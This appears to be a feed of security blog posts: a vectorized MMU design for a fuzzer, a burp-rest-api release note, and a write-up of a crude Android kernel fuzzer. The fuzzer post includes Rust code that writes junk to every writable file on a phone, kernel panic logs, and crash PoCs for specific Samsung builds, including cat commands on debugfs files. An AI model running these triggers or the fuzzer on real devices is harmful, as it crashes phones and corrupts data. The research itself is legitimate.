To handle translations failing at different points, we mask off VMs as they fail at various points. At the end of the translation we determine if any VM failed, and if it did we can report the failure correctly for all VM’s that failed at any point during the translation. This allows us to get a correct caused_vmexit mask from a single translation, rather than getting a partial report and getting more exceptions at a different translation stage on the next re-entry.

Vectorized dirty list updating

Further we have to handle dirty bits. I do this in a weird way right now and it might change over time. I’m trying to keep all possible JIT at parity with the interpreted implementation. The interpreted version is naive and simply performs the translations on all VMs in left-to-right order (see the JIT tests for this operation). This also maintains that no duplicates ever exist in the dirty lists.

To prevent duplicates in the dirty list we rely on the dirty bit in the page table, however when handling differing addresses we could potentially update the same address twice and create two dirty entries. The solution I made for this is to perform vectorized checks for the dirty bits, and if they’re already set we skip the expensive setting of the dirty bits. This is the fast path.

However in the slow path we store the addresses to the stack and individually update dirty bits and dirty entries for each lane. This prevents us from adding duplicates to the dirty list and keeps the JIT implementation at parity with the interpreter (thus allowing 1-to-1 checks for JIT correctness against the interpreter). Since we skip this slow path if the memory is already dirty, this probably won’t matter for performance. If it turns out to matter later on I might drop the no-duplicates-in-the-dirty-list restriction and vectorize updates to this list.

IL MMU routines

I’m going to have a whole blog on my IL, but it’s a simple SSA IL.

Memory accesses themselves are pretty fast in my vectorized model, however the translations are slow. To mitigate this I split up translations and read/write operations in my IL. Since page walks, dirty updates, and permission checks are done in my translate IL instruction, I’m able to reuse translations from previous locations in the IL graph which use the same IL expression as the address.

For example, a 4-byte translate for writing of rsp+0x50 occurs at the root block of a function. Now at future locations in the graph which read or write at the same location for 4-or-fewer bytes can reuse the translation. Since it’s an SSA the rsp+0x50 value is tied to a certain version of rsp, thus changes to rsp do not cause the wrong translation to be used. This effectively deletes the page walks for stack locals and other memory which is not dynamically indexed in the function. It’s kind of like having a TLB in the IL itself.

Since the initial translate was responsible for the permission checks and updates of things like the RaW bits and dirty bits, we never have to run these checks again in this case. This turns memory operations into simple loads and stores.

Since stores are supersets of loads and larger sizes are supersets of smaller sizes, I can use translations from slightly different sizes and accesses.

Since it’s possible a VM exit occurs and memory/permissions are changed, I must have invalidate these translations on VM exits. More specifically I can invalidate them only on VM entries where a page table modification was made since the last VM exit. This makes the invalidate case rare enough to not matter.

The performance numbers

These are the performance numbers (in cycles) for each type and size of operation. The translate times are the cost of walking the page tables and validating permissions, the access times are the cost of reading/writing to already translated memory. The benchmarks were done on a Xeon Phi 7210 on a single hardware thread. All times are in cycles for a translation and access times for all 8 lanes.

These are best-case translate/access times as it’s the same memory translated in a loop over and over causing the tables and memory in question to be present in L1 cache.

The divergent cases are ones where different addresses were supplied to each lane and force vectorized page walks.

Write: false | opsize: 1 | Diverge: false | Translate    37.8132 cycles | Access    10.5450 cycles
Write: false | opsize: 2 | Diverge: false | Translate    39.0831 cycles | Access    11.3500 cycles
Write: false | opsize: 4 | Diverge: false | Translate    39.7298 cycles | Access    10.6403 cycles
Write: false | opsize: 8 | Diverge: false | Translate    35.2704 cycles | Access     9.6881 cycles
Write: true  | opsize: 1 | Diverge: false | Translate    44.9504 cycles | Access    16.6908 cycles
Write: true  | opsize: 2 | Diverge: false | Translate    45.9377 cycles | Access    15.0110 cycles
Write: true  | opsize: 4 | Diverge: false | Translate    44.8083 cycles | Access    16.0191 cycles
Write: true  | opsize: 8 | Diverge: false | Translate    39.7565 cycles | Access     8.6500 cycles
Write: false | opsize: 1 | Diverge: true  | Translate   140.2084 cycles | Access    16.6964 cycles
Write: false | opsize: 2 | Diverge: true  | Translate   141.0708 cycles | Access    16.7114 cycles
Write: false | opsize: 4 | Diverge: true  | Translate   140.0859 cycles | Access    16.6728 cycles
Write: false | opsize: 8 | Diverge: true  | Translate   137.5321 cycles | Access    14.1959 cycles
Write: true  | opsize: 1 | Diverge: true  | Translate   158.5673 cycles | Access    22.9880 cycles
Write: true  | opsize: 2 | Diverge: true  | Translate   159.3837 cycles | Access    21.2704 cycles
Write: true  | opsize: 4 | Diverge: true  | Translate   156.8409 cycles | Access    22.9207 cycles
Write: true  | opsize: 8 | Diverge: true  | Translate   156.7783 cycles | Access    16.6400 cycles

Performance analysis

These numbers actually look really good. Just about 10 or so cycles for most accesses. The translations are much more expensive but with TLBs and caching the translations in the IL tree we should hopefully do these things rarely. The divergent translation times are about 3.5x more expensive than the scalar counterparts which is pretty impressive. 8 separate page walks at only 3.5x more cost than a single walk! That’s a big win for this new MMU!

TLBs (not implemented as of this writing)

Similar to the cached translations in the IL tree, I can have a TLB which caches a limited amount of arbitrary translations, just like an actual CPU or many other JITs. I currently plan on having TLB entries for each type of operation such that no permission checks are needed on read/write routines. However I could use a more typical TLB model where translations are cached (rather than permission checks and RaW updates), and then I would have to perform permission checks and RaW updates on all memory accesses (but not the translation phase).

I plan to just implement both models and benchmark them. The complexity of theorizing this performance difference is higher than just doing it and getting real measurements…

Fast injection/permission modifications

To support fast fuzz case injection and permission changes I have a few handwritten AVX-512 routines which are optimized for speed. These can then be tested against the naive reference implementation for correctness as there’s a much higher chance for mistakes.

I expose 3 different routines for this. A vectorized broadcast (writing the same memory to multiple VMs), a vectorized memset (applying the same byte to either memory contents or permissions), and a vectorized write-multiple.

Vectorized broadcast

This one is pretty simple. You supply an address in the VM, a payload, and a mask (deciding which VMs to actually write to). This will then write the same payload to all VMs which are enabled by the mask. This surprisingly doesn’t have a huge use case that I can think of yet.

Vectorized memset

Since permissions and memory are stored right next to each other this memset is written in a way that it can be used to update either permissions or contents. This takes in an address, a byte to broadcast, a bool indicating if it should write to permissions or contents, and a mask of VMs to broadcast to.

This routine is how permissions are updated in bulk. I can quickly update permissions on arbitrary sets of VMs in a vectorized manner. Further it can be used on contents to do things like handle zeroing of memory on a hooked call like malloc().

Vectorized write-multiple

This is how we get fuzz cases in. I take one address, a VM mask, and multiple inputs. I then inject those inputs to their corresponding VMs all at the same address. This allows me to write all my differing fuzz cases to the same location in memory very quickly. Since most fuzzing is writing an input to all VMs at the same location this should suffice for most cases. If I find I’m frequently writing multiple inputs to multiple different locations I’ll probably make another specialized routine.

Due to the complexities of handling partial reads from the input buffers in a vectorized way, this routine is restricted to writing 8-byte size aligned payloads to 8-byte aligned addresses. To get around this I just pad out my fuzz inputs to 8-byte boundaries.

Are these fast routines really needed?

For example the benchmarks for the Rust implementation for a page table of shape: [16, 16, 16, 13, 3]

Note that the benchmarks are a single hardware thread running on a Xeon Phi 7210

Empty SoftMMU created in                            0.0000 seconds
1 MiB of deduped memory added in                    0.1873 seconds
1024 byte chunks read per second                30115.5741
1024 byte chunks written per second             29243.0394
1024 byte chunks memset per second              29340.3969
1024 byte chunks permed per second              34971.7952
1024 byte chunks write multiple per second       6864.1243

And the AVX-512 handwritten implementation on the same machine and same shape:

Empty SoftMMU created in                            0.0000 seconds
1 MiB of deduped memory added in                    0.1878 seconds
1024 byte chunks read per second                30073.5090
1024 byte chunks written per second            770678.8377
1024 byte chunks memset per second             777488.8143
1024 byte chunks permed per second             780162.1310
1024 byte chunks write multiple per second     751352.4038

Effectively a 25x speedup for the same result!

With a larger page size ([16, 16, 16, 6, 10]) this number goes down as I can use the old translation longer and I spend less time translating pages:

Rust implementations:

Empty SoftMMU created in                            0.0001 seconds
1 MiB of deduped memory added in                    0.0829 seconds
1024 byte chunks read per second                30201.6634
1024 byte chunks written per second             31850.8188
1024 byte chunks memset per second              31818.1619
1024 byte chunks permed per second              34690.8332
1024 byte chunks write multiple per second       7345.5057

Hand-optimized implementations:

Empty SoftMMU created in                            0.0001 seconds
1 MiB of deduped memory added in                    0.0826 seconds
1024 byte chunks read per second                30168.3047
1024 byte chunks written per second          32993840.4624
1024 byte chunks memset per second           33131493.5139
1024 byte chunks permed per second           36606185.6217
1024 byte chunks write multiple per second   10775641.4470

In this case it’s over 1000x faster for some of the implementations! At this rate we can trivially get inputs in much faster than the underlying code possibly could run!


Future improvements/ideas

Currently a full 64-bit address space is emulated. Since nothing we emulate uses a full 64-bit address space this is overkill and increases the page table memory size and page table walk costs. In the future I plan to add support for partial address space support. For example if you only define the page table to handle 16-bit addresses, it will, optionally based on another constant, make sure addresses are sign-extended or zero-extended from these 16-bit addresses. By supporting both sign-extended and zero-extended addresses we should be able to model all architecture’s specific behaviors. This means if running a 32-bit application in our 64-bit JIT we could use a 32-bit address space and decrease the cost of the MMU.

I could add more fast-injection routines as needed.

I may move permission checks to loads/stores rather than translation IL operations, to allow reuse of TLB entries for the same page but differing offsets/operations.

Introducing burp-rest-api v2

4 November 2018 at 23:00

Since the first commit back in 2016, burp-rest-api has been the default tool for BurpSuite-powered web scanning automation. Many security professionals and organizations have relied on this extension to orchestrate the work of Burp Spider and Scanner.

Today, we’re proud to announce a new major release of the tool: burp-rest-api v2.0.1

Starting in June 2018, Doyensec joined VMware in the development and support of the growing burp-rest-api community. After several years of experience in big tech companies and startups, we understand the need for security automation to improve efficacy and efficiency during software security activities. Unfortunately internal security tools are rarely open-sourced, and still, too many companies are reinventing the wheel. We believe that working together on foundational components, such as burp-rest-api, represents the future of security automation as it empowers companies of any size to build customized solutions.

After a few weeks of work, we cleaned up all the open issues and brought burp-rest-api to its next phase. In this blog post, we would like to summarize some of the improvements.

Releases

You can now download the latest version of burp-rest-api from https://github.com/vmware/burp-rest-api/releases in a precompiled release build. While this may not sound like a big deal, it’s actually the result of a major change in the plugin bootstrap mechanism. Until now, burp-rest-api was strictly dependent on the original Burp Suite JAR to be compiled, hence we weren’t able to create stable releases due to licensing. By re-engineering the way burp-rest-api starts, it is now possible to build the extension without even having burpsuite_pro.jar.

git clone [email protected]:vmware/burp-rest-api.git
cd burp-rest-api
./gradlew clean build

Once built, you can now execute Burp with the burp-rest-api extension using the following command:

java -jar burp-rest-api-2.0.0.jar --burp.jar=./lib/burpsuite_pro.jar

Burp Extensions and BAppStore

Many users have asked for the ability to load additional extensions while running Burp with burp-rest-api. Thanks to a new bootstrap mechanism, burp-rest-api is loaded as a 2nd generation extension which makes it possible to load both custom and BAppStore extensions written in any of the supported programming languages.

Moreover, the tool allows loading extensions during application startup using the flag --burp.ext=<filename.{jar,rb,py}>.

In order to implement this, we employed a classloading technique with a dummy entry point (BurpExtender.java) that loads the legacy Burp extension (LegacyBurpExtension.java) after the full Burp Suite has been loaded and launched (BurpService.java).

Bug Fixes and Improvements

In this release, we have also focused our efforts on a massive issues house-cleaning:

  • Better documentation and even a FAQs page
  • Burp Spider status API
  • Burp Configuration with configPath selection API
  • Enabled SpringBoot compression
  • Ability to customize the binding address:port for both Burp Proxy and burp-rest-api APIs via command line arguments
  • …and much more

Help Us Shape The Future of burp-rest-api

With the release of Burp Suite Professional 2.0 (beta), Burp includes a native Rest API.

While the current functionalities are very limited, this is certainly going to change.

In the initial release, the REST API supports launching vulnerability scans and obtaining the results. Over time, additional functions will be added to the REST API.

It’s great that Burp users will finally benefit from a native Rest API, however this new feature makes us wonder about the future for this project.

Let us know how burp-rest-api can still provide value, and which directions the project could take. Comment on this Github Issue or tweet to our @Doyensec account.

Thank you for the support,

Luca Carettoni & Andrea Brancaleoni

Writing the worlds worst Android fuzzer, and then improving it

18 October 2018 at 09:57

So slimy it belongs in the slime tree

Why

Changelog

Date Info
2018-10-18 Initial

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Disclaimer

I recognize the bugs discussed here are not widespread Android bugs individually. None of these are terribly critical and typically only affect one specific device. This blog is meant to be fun and silly and not meant to be a serious review of Android’s security.

Give me the code

Slime Tree Repo

Intro

Today we’re going to write arguably one of the worst Android fuzzers possible. Experience unexpected success, and then make improvements to make it probably the second worst Android fuzzer.

When doing Android device fuzzing the first thing we need to do is get a list of devices on the phone and figure out which ones we can access. This is simple right? All we have to do is go into /dev and run ls -l, and anything with read or write permissions for all users we might have a whack at. Well… with selinux this is just not the case. There might be one person in the world who understands selinux but I’m pretty sure you need a Bombe to decode the selinux policies.

To solve this problem let’s do it the easy way and write a program that just runs in the context we want bugs from. This program will simply recursively list all files on the phone and actually attempt to open them for reading and writing. This will give us the true list of files/devices on the phone we are able to open. In this blog’s case we’re just going to use adb shell and thus we’re running as u:r:shell:s0.

Recursive listdiring

Alright so I want a quick list of all files on the phone and whether I can read or write to them. This is pretty easy, let’s do it in Rust.

/// Recursively list all files starting at the path specified by `dir`, saving
/// all files to `output_list`
fn listdirs(dir: &Path, output_list: &mut Vec<(PathBuf, bool, bool)>) {
    // List the directory
    let list = std::fs::read_dir(dir);

    if let Ok(list) = list {
        // Go through each entry in the directory, if we were able to list the
        // directory safely
        for entry in list {
            if let Ok(entry) = entry {
                // Get the path representing the directory entry
                let path = entry.path();

                // Get the metadata and discard errors
                if let Ok(metadata) = path.symlink_metadata() {
                    // Skip this file if it's a symlink
                    if metadata.file_type().is_symlink() {
                        continue;
                    }

                    // Recurse if this is a directory
                    if metadata.file_type().is_dir() {
                        listdirs(&path, output_list);
                    }

                    // Add this to the directory listing if it's a file
                    if metadata.file_type().is_file() {
                        let can_read =
                            OpenOptions::new().read(true).open(&path).is_ok();
                        
                        let can_write =
                            OpenOptions::new().write(true).open(&path).is_ok();

                        output_list.push((path, can_read, can_write));
                    }
                }
            }
        }
    }
}

Woo, that was pretty simple, to get a full directory listing of the whole phone we can just:

// List all files on the system
let mut dirlisting = Vec::new();
listdirs(Path::new("/"), &mut dirlisting);

Fuzzing

So now we have a list of all files. We now can use this for manual analysis and look through the listing and start doing source auditing of the phone. This is pretty much the correct way to find any good bugs, but maybe we can automate this process?

What if we just randomly try to read and write to the files. We don’t really have any idea what they expect, so let’s just write random garbage to them of reasonable sizes.

// List all files on the system
let mut listing = Vec::new();
listdirs(Path::new("/"), &mut listing);

// Fuzz buffer
let mut buf = [0x41u8; 8192];

// Fuzz forever
loop {
    // Pick a random file
    let rand_file = rand::random::<usize>() % listing.len();
    let (path, can_read, can_write) = &listing[rand_file];

    print!("{:?}\n", path);

    if *can_read {
        // Fuzz by reading
        let fd = OpenOptions::new().read(true).open(path);

        if let Ok(mut fd) = fd {
            let fuzz_size = rand::random::<usize>() % buf.len();
            let _ = fd.read(&mut buf[..fuzz_size]);
        }
    }

    if *can_write {
        // Fuzz by writing
        let fd = OpenOptions::new().write(true).open(path);
        if let Ok(mut fd) = fd {
            let fuzz_size = rand::random::<usize>() % buf.len();
            let _ = fd.write(&buf[..fuzz_size]);
        }
    }
}

When running this it pretty much stops right away, getting hung on things like /sys/kernel/debug/tracing/per_cpu/cpu1/trace_pipe. There are typically many sysfs and procfs files on the phone that will hang forever when trying to read from them. Since this prevents our “fuzzer” from running any longer we need to somehow get around blocking reads.

How about we just make lets say… 128 threads and just be okay with threads hanging? At least some of the others will keep going for at least a while? Here’s the complete program:

extern crate rand;

use std::sync::Arc;
use std::fs::OpenOptions;
use std::io::{Read, Write};
use std::path::{Path, PathBuf};

/// Maximum number of threads to fuzz with
const MAX_THREADS: u32 = 128;

/// Recursively list all files starting at the path specified by `dir`, saving
/// all files to `output_list`
fn listdirs(dir: &Path, output_list: &mut Vec<(PathBuf, bool, bool)>) {
    // List the directory
    let list = std::fs::read_dir(dir);

    if let Ok(list) = list {
        // Go through each entry in the directory, if we were able to list the
        // directory safely
        for entry in list {
            if let Ok(entry) = entry {
                // Get the path representing the directory entry
                let path = entry.path();

                // Get the metadata and discard errors
                if let Ok(metadata) = path.symlink_metadata() {
                    // Skip this file if it's a symlink
                    if metadata.file_type().is_symlink() {
                        continue;
                    }

                    // Recurse if this is a directory
                    if metadata.file_type().is_dir() {
                        listdirs(&path, output_list);
                    }

                    // Add this to the directory listing if it's a file
                    if metadata.file_type().is_file() {
                        let can_read =
                            OpenOptions::new().read(true).open(&path).is_ok();
                        
                        let can_write =
                            OpenOptions::new().write(true).open(&path).is_ok();

                        output_list.push((path, can_read, can_write));
                    }
                }
            }
        }
    }
}

/// Fuzz thread worker
fn worker(listing: Arc<Vec<(PathBuf, bool, bool)>>) {
    // Fuzz buffer
    let mut buf = [0x41u8; 8192];

    // Fuzz forever
    loop {
        let rand_file = rand::random::<usize>() % listing.len();
        let (path, can_read, can_write) = &listing[rand_file];

        //print!("{:?}\n", path);

        if *can_read {
            // Fuzz by reading
            let fd = OpenOptions::new().read(true).open(path);

            if let Ok(mut fd) = fd {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.read(&mut buf[..fuzz_size]);
            }
        }

        if *can_write {
            // Fuzz by writing
            let fd = OpenOptions::new().write(true).open(path);
            if let Ok(mut fd) = fd {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.write(&buf[..fuzz_size]);
            }
        }
    }
}

fn main() {
    // Optionally daemonize so we can swap from an ADB USB cable to a UART
    // cable and let this continue to run
    //daemonize();

    // List all files on the system
    let mut dirlisting = Vec::new();
    listdirs(Path::new("/"), &mut dirlisting);

    print!("Created listing of {} files\n", dirlisting.len());

    // We wouldn't do anything without any files
    assert!(dirlisting.len() > 0, "Directory listing was empty");

    // Wrap it in an `Arc`
    let dirlisting = Arc::new(dirlisting);

    // Spawn fuzz threads
    let mut threads = Vec::new();
    for _ in 0..MAX_THREADS {
        // Create a unique arc reference for this thread and spawn the thread
        let dirlisting = dirlisting.clone();
        threads.push(std::thread::spawn(move || worker(dirlisting)));
    }

    // Wait for all threads to complete
    for thread in threads {
        let _ = thread.join();
    }
}

extern {
    fn daemon(nochdir: i32, noclose: i32) -> i32;
}

pub fn daemonize() {
    print!("Daemonizing\n");

    unsafe {
        daemon(0, 0);
    }

    // Sleep to allow a physical cable swap
    std::thread::sleep(std::time::Duration::from_secs(10));
}

Pretty simple, nothing crazy here. We get a full phone directory listing, spin up MAX_THREADS threads, and those threads loop forever picking random files to read and write to.

Let me just give this a little push to the phone annnnnnnnnnnnnnd… and the phone panicked. In fact almost all the phones I have at my desk panicked!

There we go. We have created a world class Android kernel fuzzer, printing out new 0-day!

In this case we ran this on a Samsung Galaxy S8 (G950FXXU4CRI5), let’s check out how we crashed by reading /proc/last_kmsg from the phone:

Unable to handle kernel paging request at virtual address 00662625
sec_debug_set_extra_info_fault = KERN / 0x662625
pgd = ffffffc0305b1000
[00662625] *pgd=00000000b05b7003, *pud=00000000b05b7003, *pmd=0000000000000000
Internal error: Oops: 96000006 [#1] PREEMPT SMP
exynos-snapshot: exynos_ss_get_reason 0x0 (CPU:1)
exynos-snapshot: core register saved(CPU:1)
CPUMERRSR: 0000000002180488, L2MERRSR: 0000000012240160
exynos-snapshot: context saved(CPU:1)
exynos-snapshot: item - log_kevents is disabled
TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 0
CPU: 1 MPIDR: 80000101 PID: 3944 Comm: Binder:3781_3 Tainted: G        W       4.4.111-14315050-QB19732135 #1
Hardware name: Samsung DREAMLTE EUR rev06 board based on EXYNOS8895 (DT)
task: ffffffc863c00000 task.stack: ffffffc863938000
PC is at kmem_cache_alloc_trace+0xac/0x210
LR is at binder_alloc_new_buf_locked+0x30c/0x4a0
pc : [<ffffff800826f254>] lr : [<ffffff80089e2e50>] pstate: 60000145
sp : ffffffc86393b960
[<ffffff800826f254>] kmem_cache_alloc_trace+0xac/0x210
[<ffffff80089e2e50>] binder_alloc_new_buf_locked+0x30c/0x4a0
[<ffffff80089e3020>] binder_alloc_new_buf+0x3c/0x5c
[<ffffff80089deb18>] binder_transaction+0x7f8/0x1d30
[<ffffff80089e0938>] binder_thread_write+0x8e8/0x10d4
[<ffffff80089e11e0>] binder_ioctl_write_read+0xbc/0x2ec
[<ffffff80089e15dc>] binder_ioctl+0x1cc/0x618
[<ffffff800828b844>] do_vfs_ioctl+0x58c/0x668
[<ffffff800828b980>] SyS_ioctl+0x60/0x8c
[<ffffff800815108c>] __sys_trace_return+0x0/0x4

Ah cool, derefing 00662625, my favorite kernel address! Looks like it’s some form of heap corruption. We probably could exploit this especially as if we mapped in 0x00662625 we would get to control a kernel land object from userland. It would require the right groom. This specific bug has been minimized and you can find a targeted PoC in the Wall of Shame section

Using the “fuzzer”

You’d think this fuzzer is pretty trivial to run, but there are some things that can really help it along. Especially on phones which seem to fight back a bit.

Protips:

  • Restart fuzzer regularly, it gets stuck a lot
  • Do random things on the phone like browsing or using the camera to generate kernel activity
  • Kill the app and unplug the ADB USB cable frequently, this can cause some of the bugs to trigger when the application suddenly dies
  • Tweak the MAX_THREADS value from low values to high values
  • Create blacklists for files which are known to block forever on reads

Using the above protips I’ve been able to get this fuzzer to work on almost every phone I have encountered in the past 4 years, with dwindling success as selinux policies get stricter.

Next device

Okay so we’ve looked at the latest Galaxy S8, let’s try to look at an older Galaxy S5 (G900FXXU1CRH1). Whelp, that one crashed even faster. However if we try to get /proc/last_kmsg we will discover that this file does not exist. We can also try using a fancy UART cable over USB with the magic 619k resistor and daemonize() the application so we can observe the crash over that. However that didn’t work in this case either (honestly not sure why, I get dmesg output but no panic log).

So now we have this problem. How do we root cause this bug? Well, we can do a binary search of the filesystem and blacklist files in certain folders and try to whittle it down. Lets give that a shot!

First let’s only allow use of /sys/* and beyond, all other files will be disallowed, typically these bugs from the fuzzer come from sysfs and procfs. We’ll do this by changing the directory listing call to listdirs(Path::new("/sys"), &mut dirlisting);

Woo, it worked! Crashed faster, and this time we limited to /sys. So we know the bug exists somewhere in /sys.

Now we’ll go deeper in /sys, maybe we try /sys/devices… oops, no luck. We’ll have to try another. Maybe /sys/kernel?… WINNER WINNER!

So we’ve whittled it down further to /sys/kernel/debug but now there are 85 folders in this directory. I really don’t want to manually try all of them. Maybe we can improve our fuzzer?

Improving the fuzzer

So currently we have no idea which files were touched to cause the crash. We can print them and then view them over ADB, however this doesn’t sync when the phone panics… we need even better.

Perhaps we should just send the filenames we’re fuzzing over the network and then have a service that acks the filenames, such that the files are not touched unless they have been confirmed to be reported over the wire. Maybe this would be too slow? Hard to say. Let’s give it a go!

We’ll make a quick server in Rust to run on our host, and then let the phone connect to this server over ADB USB via adb reverse tcp:13370 tcp:13370, which will forward connections to 127.0.0.1:13370 on the phone to our host where our program is running and will log filenames.

Designing a terrible protocol

We need a quick protocol that works over TCP to send filenames. I’m thinking something super easy. Send the filename, and then the server responds with “ACK”. We’ll just ignore threading issues and the fact that heap corruption bugs will usually show up after the file was accessed. We don’t want to get too carried away and make a reasonable fuzzer, eh?

use std::net::TcpListener;
use std::io::{Read, Write};

fn main() -> std::io::Result<()> {
    let listener = TcpListener::bind("0.0.0.0:13370")?;

    let mut buffer = vec![0u8; 64 * 1024];

    for stream in listener.incoming() {
        print!("Got new connection\n");

        let mut stream = stream?;

        loop {
            if let Ok(bread) = stream.read(&mut buffer) {
                // Connection closed, break out
                if bread == 0 {
                    break;
                }

                // Send acknowledge
                stream.write(b"ACK").expect("Failed to send ack");
                stream.flush().expect("Failed to flush");

                let string = std::str::from_utf8(&buffer[..bread])
                    .expect("Invalid UTF-8 character in string");
                print!("Fuzzing: {}\n", string);
            } else {
                // Failed to read, break out
                break;
            }
        }
    }

    Ok(())
}

This server is pretty trash, but it’ll do. It’s a fuzzer anyways, can’t find bugs without buggy code.

Client side

From the phone we just implement a simple function:

// Connect to the server we report to and pass this along to functions
// threads that need socket access
let stream = Arc::new(Mutex::new(TcpStream::connect("127.0.0.1:13370")
    .expect("Failed to open TCP connection")));

fn inform_filename(handle: &Mutex<TcpStream>, filename: &str) {
    // Report the filename
    let mut socket = handle.lock().expect("Failed to lock mutex");
    socket.write_all(filename.as_bytes()).expect("Failed to write");
    socket.flush().expect("Failed to flush");

    // Wait for an ACK
    let mut ack = [0u8; 3];
    socket.read_exact(&mut ack).expect("Failed to read ack");
    assert!(&ack == b"ACK", "Did not get ACK as expected");
}

Developing blacklist

Okay so now we have a log of all files we’re fuzzing, and they’re confirmed by the server so we don’t lose anything. Lets set it into single threaded mode so we don’t have to worry about race conditions for now.

We’ll see it frequently gets hung up on files. We’ll make note of the files it gets hung up on and start developing a blacklist. This takes some manual labor, and usually there are a handful (5-10) files we need to put in this list. I typically make my blacklist based on the start of a filename, thus I can blacklist entire directories based on starts_with matching.

Back to fuzzing

So when fuzzing the last file we saw touched was /sys/kernel/debug/smp2p_test/ut_remote_gpio_inout before a crash.

Let’s hammer this in a loop… and it worked! So now we can develop a fully self contained PoC:

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    let fn = "/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout";

    loop {
        if let Ok(mut fd) = File::open(fn) {
            let _ = fd.read(&mut buf);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

What a top tier PoC!

Next bug?

So now that we have root caused the bug, we should blacklist the specific file we know caused the bug and try again. Potentially this bug was hiding another.

Nope, nothing else, the S5 is officially secure and fixed of all bugs.

The end of an era

Sadly this fuzzer is on the way out. It used to work almost universally on every phone, and still does if selinux is set to permissive. But sadly as time has gone on these bugs have become hidden behind selinux policies that prevent them from being reached. It now only works on a few phones that I have rather than all of them, but the fact that it ever worked is probably the best part of it all.

There is a lot to improve this fuzzer, but the goal of this article was to make a terrible fuzzer, not a reasonable one. The big things to add to make this better

  • Make it perform random ioctl() calls
  • Make it attempt to mmap() and use the mappings for these devices
  • Actually understand what the file expects
  • Use multiple processes or something to let the fuzzer continue to run when it gets stuck
  • Run it for more than 1 minute before giving up on a phone
  • Make better blacklists/whitelists

In the future maybe I’ll exploit one of these bugs in another blog, or root cause them in source.

Wall of Shame

Try it out on your own test phones (not on your actual phone, that’d probably be a bad idea). Let me know if you have any silly bugs found by this to add to the wall of shame.

G900F (Exynos Galaxy S5) [G900FXXU1CRH1] (August 1, 2017)

PoC

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    let fn = "/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout";

    loop {
        if let Ok(mut fd) = File::open(fn) {
            let _ = fd.read(&mut buf);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

J200H (Galaxy J2) [J200HXXU0AQK2] (August 1, 2017)

not root caused, just run the fuzzer

[c0] Unable to handle kernel paging request at virtual address 62655726
[c0] pgd = c0004000
[c0] [62: ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>]    lr : [<62655722>]    psr: 000d0093
sp : ee457d20  ip : 00000000  fp : ee457d54
[c0] r10: ed859210  r9 : c0c833e4  r8 : ed859338
[c0] r7 : ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>]    lr : [<62655722>]    psr: 000d0093
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d0013 00000000 ffffffff ffffffff
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d[<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)
[c0] [<c003d6bc>] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/usb_serial0/readstatus

or

cat /sys/kernel/debug/usb_serial1/readstatus

or

cat /sys/kernel/debug/usb_serial2/readstatus

or

cat /sys/kernel/debug/usb_serial3/readstatus

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/mdp/xlog/dump

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/rpm_master_stats

J700H (Galaxy J7) [J700HXXU3BRC2] (August 1, 2017)

not root caused, just run the fuzzer

Unable to handle kernel paging request at virtual address ff00000107
pgd = ffffffc03409d000
[ff00000107] *pgd=0000000000000000
mms_ts 9-0048: mms_sys_fw_update [START]
mms_ts 9-0048: mms_fw_update_from_storage [START]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] file_open - path[/sdcard/melfas.mfsb]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] -3
mms_ts 9-0048: mms_sys_fw_update [DONE]
muic-universal:muic_show_uart_sel AP
usb: enable_show dev->enabled=1
sm5703-fuelga0000000000000000
Kernel BUG at ffffffc00034e124 [verbose debug info unavailable]
